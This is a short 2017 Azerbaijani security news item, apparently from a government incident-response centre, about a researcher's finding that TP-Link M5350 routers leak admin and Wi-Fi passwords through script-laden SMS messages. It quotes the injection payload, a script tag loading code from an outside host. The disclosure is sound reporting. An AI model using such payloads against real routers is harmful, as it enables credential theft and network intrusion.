XÜSUSİ DÖVLƏT MÜHAFİZƏ XİDMƏTİ
XÜSUSİ RABİTƏ VƏ İNFORMASİYA
TƏHLÜKƏSİZLİYİ DÖVLƏT AGENTLİYİ

KOMPÜTER İNSİDENTLƏRİNƏ QARŞI MÜBARİZƏ
MƏRKƏZİ

İnsident bildir

Xəbərlər > TP-Link marşrutlayıcısındakı mövcud boşluqlar SMS vasitəsilə şifrə əldə etməyə imkan verir.

11 Apr 2017

 Cihazın SIM-kartına SMS göndərmək yolu ilə inzibatçı uçot qeydlərinin və Wi-Fi şifrəsini əldə etmək olar. Almaniya mütəxəssisi Yan Xerş Çin istehsalı TP-Link şirkətinin marşrutlayıcılarındakı mövcud boşluqlar onun SİM-kartına xüsusi şriftlə SMS-mesaj göndərmək yolu ilə cihazın şifrəsini əldə etməyə imkan verdiyini bildirib. Problem 3G simsiz mobil - TP-Link M5350 marşrutlayıcıya aiddir. Bleepingcomputer jurnalisti ilə söhbətində tədqiqatçı açıqlayıb ki, rabitə operatorları çox vaxt öz müştərilərinə marşrutlayıcıya SİM-kart yerləşdirilən bu modeli təklif edirlər. SIM-kart marşrutlayıcıya operatorun şəbəkəsinə qoşulmağa imkan verir və istənilən digər SİM-kart kimi bunun da öz nömrəsi var. Marşrutlayıcının proqram təminatının analizi zamanı Xerş SMS-mesajların daxil olduğu emal funksiyasında mövcud boşluqları aşkara çıxartdı. O müəyyənləşdirib ki, şrift <script src=//n.ms/a.js >< /script > yolu ilə məlumatları göndərməklə inzibatçının uçot qeydlərinin şifrəsini, simsiz şəbəkə (SSID) identifikatorunu və Wi-Fi şəbəkəsinin şifrəsini əldə edə bilər.

Mütəxəssisin sözlərinə görə, təhlükə göründüyü kimi bir o qədər də qorxulu deyil, çünki mövcud boşluqların istismarı üçün cinayətkara marşrutlayıcı SİM-kartının nömrəsini bilmək lazımdır.